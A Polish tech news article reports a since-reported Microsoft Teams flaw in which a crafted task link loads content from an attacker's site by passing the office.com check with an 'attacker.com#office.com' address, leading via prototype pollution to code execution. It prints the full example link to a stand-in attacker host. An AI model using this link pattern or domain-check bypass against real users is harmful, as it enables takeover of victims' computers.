Problem z Microsoft Teams. Otwierasz link i tracisz wszystko

Nawet aplikacje dostarczane przez branżowych gigantów mogą mieć proste podatności. Taka sytuacja dotyczy Microsoft Teams. Popularne w firmach oprogramowanie miało ogromną lukę, która pozwalała przestępcom na przejęcie kontroli nad komputerem ofiary.

Microsoft Teams
Microsoft Teams
Źródło zdjęć: © WP | Oskar Ziomek

Wystarczy niewielkie niedopatrzenie twórców oprogramowania, by dać hakerom okazję do działania. Zdarza się to nawet w przypadku popularnych aplikacji, które są dostarczane przez największe firmy technologiczne na rynku. Jedna z takich niebezpiecznych podatności została wykryta w Microsoft Teams.

Opis podatności Microsoft Teams możemy przeczytać w serwisie sekurak.pl. Dowiemy się stamtąd, że pozwala ona na uruchomienie pewnej funkcji w aplikacji, która ładuje treści z zewnętrznej strony internetowej (należącej do osoby, która dokonuje ataku) po otwarciu przesłanego przez Teams specjalnie przygotowanego linku. Poniżej prezentujemy przykładowy format linku, który mógłby zadziałać w przypadku tego typu ataku:

[https://]teams[.]live[.]com/_#/l/task/1ded03cb-ece5-4e7c-9f73-61c375528078?url=[https://]attacker[.]com%23[.]office[.]com/&height=100&width=100&title=hey&fallbackURL=https://aka[.]ms/hey&completionBotId=1&fqdn=teams[.]live[.]com

Dalsza część artykułu pod materiałem wideo

Czy warto kupić kamerę internetową Logitech Brio 500?

W teorii Microsoft Teams powinien akceptować tego typu odnośnik tylko wówczas, gdy prowadzi do domeny office.com. W tym przypadku cyberprzestępcom udało się w łatwy sposób ominąć sprawdzenie tego faktu, przez użycie adresu: https[://]attacker[.]com#office[.]com.

To doprowadza do sytuacji, w której możliwe jest załadowanie dowolnej zawartości ze strony cyberprzestępcy, przy wykorzystaniu luki klasy prototype pollution. Umożliwia to wykonanie kodu na komputerze ofiary, który to w zależności od wizji atakującego może realizować różne funkcje, w tym nawet przejmować dostęp do urządzenia.

Jak czytamy w serwisie sekurak.pl, podatność ta prawdopodobnie została już załatana. Została ona bowiem zgłoszona do konkursu Pwn2Own Vancouver 2022.

Karol Kołtowski, dziennikarz dobreprogramy.pl

Jesteś świadkiem próby oszustwa?Poinformuj nas o tym zdarzeniu!

Programy

Zobacz więcej

Wybrane dla Ciebie

Komentarze (26)